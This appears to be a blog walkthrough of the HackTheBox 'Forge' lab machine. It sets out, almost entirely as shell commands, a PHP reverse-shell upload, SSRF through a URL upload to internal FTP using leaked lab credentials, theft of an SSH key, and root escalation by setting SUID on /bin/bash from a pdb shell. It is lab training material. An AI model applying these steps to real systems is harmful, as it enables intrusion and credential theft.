Hack_The_Box_Writeups

HackTheBox – Forge Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.111

http://forge.htb/

http://forge.htb/upload

┌──(rootkali)-[/home/kali/Downloads]

└─# cp /usr/share/laudanum/php/php-reverse-shell.php test1.php

http://forge.htb/uploads/Fn1T9NPtQKBZ9yeDNhQ1

┌──(rootkali)-[/home/kali/Downloads]

└─# ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H “Host: FUZZ.forge.htb” -t 200 -fl 10

http://admin.forge.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/zpEV4OW89xN8btm6wm0F

I got a folder named “ announcements” lets append this again in the URL upload, then your upload URL would look like :http://ADMIN.FORGE.HTB/announcements

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/6y4WUK66VfUqa3jsGg5C

I got some useful info including ftp creds and the scripting method to upload img.

Tried the method to access ftp and its folder by again submitting URL by using URL upload method, below is the link I used to upload:

http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/ApWCvb75cjvtTFI37syO

http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/jJYhT1sBxieg2C7RCOxb

┌──(rootkali)-[/home/kali/Downloads]

└─# chmod 600 id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa user@10.10.11.111 

user@forge:~$ id

user@forge:~$ cd /home

user@forge:/home$ ls –lrt

user@forge:/home$ cd user

user@forge:~$ cat user.txt

user@forge:~$ sudo –l

user@forge:~$ cat /opt/remote-manage.py

Open another session

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa user@10.10.11.111  

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py

Just open another terminal connect to ssh and try connecting to that port using nc , if you’ve done it correct you must get selection option, similar to below image. Now exceeding the length so that it could enter the pdb debugger.

user@forge:~$ nc localhost 43560

password: secretadminpassword

Now you get the PDB shell 

Its time to escalate privilege, type below commands:

(Pdb) import os

(Pdb) os.system (‘chmod u+s /bin/bash’)

(Pdb) exit

user@forge:~$ /bin/bash -p

bash-5.0# id

bash-5.0# cd /root

bash-5.0# cat root.txt

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *